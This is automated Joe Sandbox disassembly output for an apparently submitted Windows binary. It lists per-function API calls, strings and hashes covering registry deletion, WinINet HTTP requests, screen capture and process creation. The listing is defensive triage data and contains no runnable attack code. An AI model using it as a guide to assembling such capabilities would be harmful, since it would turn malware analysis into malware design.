                        • Instruction Fuzzy Hash: 25E1E572A00516ABCF1B9FA8C481BFEFBB4BF44710F568119E556FB250DB30AE858790
                        APIs
                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 003500C6
                          • Part of subcall function 003500ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0040070C,00000FA0,2F3428F3,?,?,?,?,003723B3,000000FF), ref: 0035011C
                          • Part of subcall function 003500ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,003723B3,000000FF), ref: 00350127
                          • Part of subcall function 003500ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,003723B3,000000FF), ref: 00350138
                          • Part of subcall function 003500ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0035014E
                          • Part of subcall function 003500ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0035015C
                          • Part of subcall function 003500ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0035016A
                          • Part of subcall function 003500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00350195
                          • Part of subcall function 003500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 003501A0
                        • ___scrt_fastfail.LIBCMT ref: 003500E7
                          • Part of subcall function 003500A3: __onexit.LIBCMT ref: 003500A9
                        Strings
                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00350122
                        • kernel32.dll, xrefs: 00350133
                        • WakeAllConditionVariable, xrefs: 00350162
                        • InitializeConditionVariable, xrefs: 00350148
                        • SleepConditionVariableCS, xrefs: 00350154
                        Similarity
                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                        • API String ID: 66158676-1714406822
                        • Opcode ID: d2bdadc748447ed92e835bba67dba1c6cb7131944385cbb1b335c974ab02eb2e
                        • Instruction ID: f7d25b1379f92bbe78ead8d11d2a6f82e8f3e6be4527bf8ad27d93b8e7e19d91
                        • Instruction Fuzzy Hash: C62129366407006FE7176B64AC0AF6A73D8DB04B52F05013AFC05E72E1DF75AC048B95
                        APIs
                        • CharLowerBuffW.USER32(00000000,00000000,003CCC08), ref: 003A4527
                        • _wcslen.LIBCMT ref: 003A453B
                        • _wcslen.LIBCMT ref: 003A4599
                        • _wcslen.LIBCMT ref: 003A45F4
                        • _wcslen.LIBCMT ref: 003A463F
                        • _wcslen.LIBCMT ref: 003A46A7
                          • Part of subcall function 0034F9F2: _wcslen.LIBCMT ref: 0034F9FD
                        • GetDriveTypeW.KERNEL32(?,003F6BF0,00000061), ref: 003A4743
                        Similarity
                        • API ID: _wcslen$BuffCharDriveLowerType
                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                        • API String ID: 2055661098-1000479233
                        • Opcode ID: 8c7c612ad472570d836c1a929963307f481245e4fe2cdb9d5da436be480df8e7
                        • Instruction ID: d20f191a2182f97e402e432ce5054bc56b0a8e9140cd04428b6d3984406a1b0a
                        • Instruction Fuzzy Hash: 61B1EF316083029FC716DF28C891A6AB7E5EFE7720F51491DF496CB2A1E7B1D844CB92
                        APIs
                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                        • DragQueryPoint.SHELL32(?,?), ref: 003C9147
                          • Part of subcall function 003C7674: ClientToScreen.USER32(?,?), ref: 003C769A
                          • Part of subcall function 003C7674: GetWindowRect.USER32(?,?), ref: 003C7710
                          • Part of subcall function 003C7674: PtInRect.USER32(?,?,003C8B89), ref: 003C7720
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 003C91B0
                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003C91BB
                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003C91DE
                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 003C9225
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 003C923E
                        • SendMessageW.USER32(?,000000B1,?,?), ref: 003C9255
                        • SendMessageW.USER32(?,000000B1,?,?), ref: 003C9277
                        • DragFinish.SHELL32(?), ref: 003C927E
                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 003C9371
                        Similarity
                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#@
                        • API String ID: 221274066-110456269
                        • Opcode ID: 32ff6184d0ded994427a584d460225cb3c12cbc23ea0ce1299fda2f055b18252
                        • Instruction ID: 30d93a0a6c1d8c0b9b7961b2b1be459276aceaeb193245c306838f8668ef1494
                        • Instruction Fuzzy Hash: 76618D71108305AFC702DF64DD89EAFBBE8EF88750F00492EF595971A0DB70AA49CB52
                        APIs
                        • _wcslen.LIBCMT ref: 003BB198
                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003BB1B0
                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003BB1D4
                        • _wcslen.LIBCMT ref: 003BB200
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003BB214
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003BB236
                        • _wcslen.LIBCMT ref: 003BB332
                          • Part of subcall function 003A05A7: GetStdHandle.KERNEL32(000000F6), ref: 003A05C6
                        • _wcslen.LIBCMT ref: 003BB34B
                        • _wcslen.LIBCMT ref: 003BB366
                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003BB3B6
                        • GetLastError.KERNEL32(00000000), ref: 003BB407
                        • CloseHandle.KERNEL32(?), ref: 003BB439
                        • CloseHandle.KERNEL32(00000000), ref: 003BB44A
                        • CloseHandle.KERNEL32(00000000), ref: 003BB45C
                        • CloseHandle.KERNEL32(00000000), ref: 003BB46E
                        • CloseHandle.KERNEL32(?), ref: 003BB4E3
                        Similarity
                        • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                        • String ID:
                        • API String ID: 2178637699-0
                        • Opcode ID: 1d55657bb90aea2db0396363699647be6e6d2d0d44cba3f3d300d35c4d656def
                        • Instruction ID: b2f0b13c42bae23d9d8f28f58a0f4f9fce3a4ce17b272bfb8beb92b7916097c5
                        • Instruction Fuzzy Hash: 04F1AF315043009FC726EF24C891B6EBBE4AF85318F19895DF9999F2A2CB71EC44CB52
                        APIs
                        • GetMenuItemCount.USER32(00401990), ref: 00372F8D
                        • GetMenuItemCount.USER32(00401990), ref: 0037303D
                        • GetCursorPos.USER32(?), ref: 00373081
                        • SetForegroundWindow.USER32(00000000), ref: 0037308A
                        • TrackPopupMenuEx.USER32(00401990,00000000,?,00000000,00000000,00000000), ref: 0037309D
                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003730A9
                        Similarity
                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                        • String ID: 0
                        • API String ID: 36266755-4108050209
                        • Opcode ID: 1b483645ffa181e9395c7477f93771f9fb1606d07949e2a498e4970384274b82
                        • Instruction ID: b575dc201b0a9176f2d6f136a9b6340a41a27d1118852640351e9e71f31d53e0
                        • Instruction Fuzzy Hash: 3F71E671644205BEEB338F25DC89FABBF68FF05364F208216F519AA1E0C7B5A910DB50
                        APIs
                        • DestroyWindow.USER32(?,?), ref: 003C6DEB
                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 003C6E5F
                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003C6E81
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003C6E94
                        • DestroyWindow.USER32(?), ref: 003C6EB5
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00330000,00000000), ref: 003C6EE4
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003C6EFD
                        • GetDesktopWindow.USER32 ref: 003C6F16
                        • GetWindowRect.USER32(00000000), ref: 003C6F1D
                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003C6F35
                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 003C6F4D
                          • Part of subcall function 00349944: GetWindowLongW.USER32(?,000000EB), ref: 00349952
                        Similarity
                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                        • String ID: 0$tooltips_class32
                        • API String ID: 2429346358-3619404913
                        • Opcode ID: b8a484f45dc8b0909883ab872700d9f666d1a5ff5fe8e38d81ff747b3057125c
                        • Instruction ID: b850a23b0fa6f4ad20362ede217385762b1bff5e92c01c5f539be380254f1753
                        • Instruction Fuzzy Hash: 6D715574104244AFDB22DF28DD59FAABBE9EF89304F08442EF989D7261C770AD06DB15
                        APIs
                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003AC4B0
                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 003AC4C3
                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 003AC4D7
                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003AC4F0
                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 003AC533
                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 003AC549
                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003AC554
                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003AC584
                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 003AC5DC
                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 003AC5F0
                        • InternetCloseHandle.WININET(00000000), ref: 003AC5FB
                        Similarity
                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                        • String ID:
                        • API String ID: 3800310941-3916222277
                        • Opcode ID: a52d36612e1ca7d774226ce587fe01af40080d33ab892460f2e9cf1a11af7e68
                        • Instruction ID: ef53319b3283116355678a7b77bbe0bf56d54c63adae3c8ec743ee2e7f8fdba9
                        • Instruction Fuzzy Hash: 99514BB1510204BFDB238F61C948EAA7BFCFF0A744F006519F949D6610DB35E944DB60
                        APIs
                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 003C8592
                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85A2
                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85AD
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85BA
                        • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85C8
                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85D7
                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85E0
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85E7
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85F8
                        • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,003CFC38,?), ref: 003C8611
                        • GlobalFree.KERNEL32(00000000), ref: 003C8621
                        • GetObjectW.GDI32(?,00000018,?), ref: 003C8641
                        • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 003C8671
                        • DeleteObject.GDI32(?), ref: 003C8699
                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003C86AF
                        Similarity
                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                        • String ID:
                        • API String ID: 3840717409-0
                        • Opcode ID: a6d57486e6006a32aae337b1257b8d263bc6e84a536abd7ae929fb99f500cace
                        • Instruction ID: 97481e60935a43c1c16f7d23834e6ab07d61d21bb08d91a0730459e76b1e04d6
                        • Instruction Fuzzy Hash: 7A410C75610204AFDB129FA5DC48EAABBBCFF89711F154458F909E7260DB70AE01DB60
                        APIs
                        • VariantInit.OLEAUT32(00000000), ref: 003A1502
                        • VariantCopy.OLEAUT32(?,?), ref: 003A150B
                        • VariantClear.OLEAUT32(?), ref: 003A1517
                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 003A15FB
                        • VarR8FromDec.OLEAUT32(?,?), ref: 003A1657
                        • VariantInit.OLEAUT32(?), ref: 003A1708
                        • SysFreeString.OLEAUT32(?), ref: 003A178C
                        • VariantClear.OLEAUT32(?), ref: 003A17D8
                        • VariantClear.OLEAUT32(?), ref: 003A17E7
                        • VariantInit.OLEAUT32(00000000), ref: 003A1823
                        Similarity
                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                        • API String ID: 1234038744-3931177956
                        • Opcode ID: 8660d6649dff298f1666fe66ff2a51fca322f225876c81187382bb2a4f17c1db
                        • Instruction ID: ed5174aaf77762885d7e0af0d2bfa7797c1d105e32500908807435ffa9eed73a
                        • Opcode Fuzzy Hash: 8660d6649dff298f1666fe66ff2a51fca322f225876c81187382bb2a4f17c1db
                        • Instruction Fuzzy Hash: 26D10E32E00505EBDB02AFA5D895BB9B7B9FF47700F14805AE846AF580DB30EC41DBA1
                        APIs
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                          • Part of subcall function 003BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BB6AE,?,?), ref: 003BC9B5
                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BC9F1
                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BCA68
                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BCA9E
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003BB6F4
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003BB772
                        • RegDeleteValueW.ADVAPI32(?,?), ref: 003BB80A
                        • RegCloseKey.ADVAPI32(?), ref: 003BB87E
                        • RegCloseKey.ADVAPI32(?), ref: 003BB89C
                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 003BB8F2
                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003BB904
                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 003BB922
                        • FreeLibrary.KERNEL32(00000000), ref: 003BB983
                        • RegCloseKey.ADVAPI32(00000000), ref: 003BB994
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                        • String ID: RegDeleteKeyExW$advapi32.dll
                        • API String ID: 146587525-4033151799
                        • Opcode ID: 4b315ca804c4b4b1902c199458acc86794bafd1ee74d1eb6995fd2a60756bf34
                        • Instruction ID: f9f510fb033d6afbcb4213ee6e6b8c3293e8fcb49172fa0a99ab916e0d7f9c15
                        • Opcode Fuzzy Hash: 4b315ca804c4b4b1902c199458acc86794bafd1ee74d1eb6995fd2a60756bf34
                        • Instruction Fuzzy Hash: 93C19D34208201AFD712DF14C495F6AFBE5FF84318F15849CE69A8B6A2CBB1ED45CB91
                        APIs
                        • GetDC.USER32(00000000), ref: 003B25D8
                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 003B25E8
                        • CreateCompatibleDC.GDI32(?), ref: 003B25F4
                        • SelectObject.GDI32(00000000,?), ref: 003B2601
                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 003B266D
                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 003B26AC
                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 003B26D0
                        • SelectObject.GDI32(?,?), ref: 003B26D8
                        • DeleteObject.GDI32(?), ref: 003B26E1
                        • DeleteDC.GDI32(?), ref: 003B26E8
                        • ReleaseDC.USER32(00000000,?), ref: 003B26F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                        • String ID: (
                        • API String ID: 2598888154-3887548279
                        • Opcode ID: 98b283260db71faae90a20767b067716d61e20c3b69e3b8276ebd869edb65e5b
                        • Instruction ID: a6b80b54b716300d19dbed2ed2fd355c3818698280649b8ccc60aca294d095be
                        • Opcode Fuzzy Hash: 98b283260db71faae90a20767b067716d61e20c3b69e3b8276ebd869edb65e5b
                        • Instruction Fuzzy Hash: F161E275D00219EFCB05CFA8D884EAEBBB9FF48310F248529EA59A7650D770A951CF50
                        APIs
                        • ___free_lconv_mon.LIBCMT ref: 0036DAA1
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D659
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D66B
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D67D
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D68F
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D6A1
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D6B3
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D6C5
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D6D7
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D6E9
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D6FB
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D70D
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D71F
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D731
                        • _free.LIBCMT ref: 0036DA96
                          • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000), ref: 003629DE
                          • Part of subcall function 003629C8: GetLastError.KERNEL32(00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000,00000000), ref: 003629F0
                        • _free.LIBCMT ref: 0036DAB8
                        • _free.LIBCMT ref: 0036DACD
                        • _free.LIBCMT ref: 0036DAD8
                        • _free.LIBCMT ref: 0036DAFA
                        • _free.LIBCMT ref: 0036DB0D
                        • _free.LIBCMT ref: 0036DB1B
                        • _free.LIBCMT ref: 0036DB26
                        • _free.LIBCMT ref: 0036DB5E
                        • _free.LIBCMT ref: 0036DB65
                        • _free.LIBCMT ref: 0036DB82
                        • _free.LIBCMT ref: 0036DB9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                        • String ID:
                        • API String ID: 161543041-0
                        • Opcode ID: 278177196097487cac48de3a350a71367e66c0310c5230840ccae3f19cb8f322
                        • Instruction ID: dfc110e27de1b08c7e9c5d28a5194ca201564474e56af22a5237be7576bcf861
                        • Opcode Fuzzy Hash: 278177196097487cac48de3a350a71367e66c0310c5230840ccae3f19cb8f322
                        • Instruction Fuzzy Hash: A6315A31B046049FEB27AA79E845B6B77E9FF42350F16C419E449DB199DB30AC508720
                        APIs
                        • GetClassNameW.USER32(?,?,00000100), ref: 0039369C
                        • _wcslen.LIBCMT ref: 003936A7
                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00393797
                        • GetClassNameW.USER32(?,?,00000400), ref: 0039380C
                        • GetDlgCtrlID.USER32(?), ref: 0039385D
                        • GetWindowRect.USER32(?,?), ref: 00393882
                        • GetParent.USER32(?), ref: 003938A0
                        • ScreenToClient.USER32(00000000), ref: 003938A7
                        • GetClassNameW.USER32(?,?,00000100), ref: 00393921
                        • GetWindowTextW.USER32(?,?,00000400), ref: 0039395D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                        • String ID: %s%u
                        • API String ID: 4010501982-679674701
                        • Opcode ID: 5748febb2b875b52b7824c17dc473fbeb6ca6a0dd5ecd003dacd9614d32afd35
                        • Instruction ID: a648bcd9a0d8653c253dd18489b8d66cd5745203d74aaeb2d8ee2e2aad52fb8f
                        • Opcode Fuzzy Hash: 5748febb2b875b52b7824c17dc473fbeb6ca6a0dd5ecd003dacd9614d32afd35
                        • Instruction Fuzzy Hash: 1791B3B1204606AFDB1ADF64C885FEAF7A8FF44350F008529F999D6190DB30EA59CB91
                        APIs
                        • GetClassNameW.USER32(?,?,00000400), ref: 00394994
                        • GetWindowTextW.USER32(?,?,00000400), ref: 003949DA
                        • _wcslen.LIBCMT ref: 003949EB
                        • CharUpperBuffW.USER32(?,00000000), ref: 003949F7
                        • _wcsstr.LIBVCRUNTIME ref: 00394A2C
                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00394A64
                        • GetWindowTextW.USER32(?,?,00000400), ref: 00394A9D
                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00394AE6
                        • GetClassNameW.USER32(?,?,00000400), ref: 00394B20
                        • GetWindowRect.USER32(?,?), ref: 00394B8B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                        • String ID: ThumbnailClass
                        • API String ID: 1311036022-1241985126
                        • Opcode ID: 210c1f81d6bb26001a7abf102b0a2b2a5b867d8f13517cefe66c46e7e29ed6d6
                        • Instruction ID: f5db9d029bac249ef57305214df8310d543c629ec440f2e50064f5608c127cc6
                        • Opcode Fuzzy Hash: 210c1f81d6bb26001a7abf102b0a2b2a5b867d8f13517cefe66c46e7e29ed6d6
                        • Instruction Fuzzy Hash: BA91A1721082059FDF06DF14C985FAA77E8FF84314F05846AFD899A196EB30ED46CBA1
                        APIs
                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003C8D5A
                        • GetFocus.USER32 ref: 003C8D6A
                        • GetDlgCtrlID.USER32(00000000), ref: 003C8D75
                        • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 003C8E1D
                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 003C8ECF
                        • GetMenuItemCount.USER32(?), ref: 003C8EEC
                        • GetMenuItemID.USER32(?,00000000), ref: 003C8EFC
                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 003C8F2E
                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 003C8F70
                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003C8FA1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                        • String ID: 0
                        • API String ID: 1026556194-4108050209
                        • Opcode ID: 333f74e9696a67a1a532d849124b240b1f44e314a6ac3ffae9aa781c12caf074
                        • Instruction ID: 234f33bd56213dbd3803d9b6c134c70a19ae7c1999002fbcd41038655583ccca
                        • Opcode Fuzzy Hash: 333f74e9696a67a1a532d849124b240b1f44e314a6ac3ffae9aa781c12caf074
                        • Instruction Fuzzy Hash: 58817B715083019BD712CF24D884EABBBE9FB89754F15092DF989DB291DB30EE01CBA1
                        APIs
                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0039DC20
                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0039DC46
                        • _wcslen.LIBCMT ref: 0039DC50
                        • _wcsstr.LIBVCRUNTIME ref: 0039DCA0
                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0039DCBC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                        • API String ID: 1939486746-1459072770
                        • Opcode ID: d18f318410fc90f8e61f625d9e0d6cfbf01247483632849f57e5f22fb4b68c51
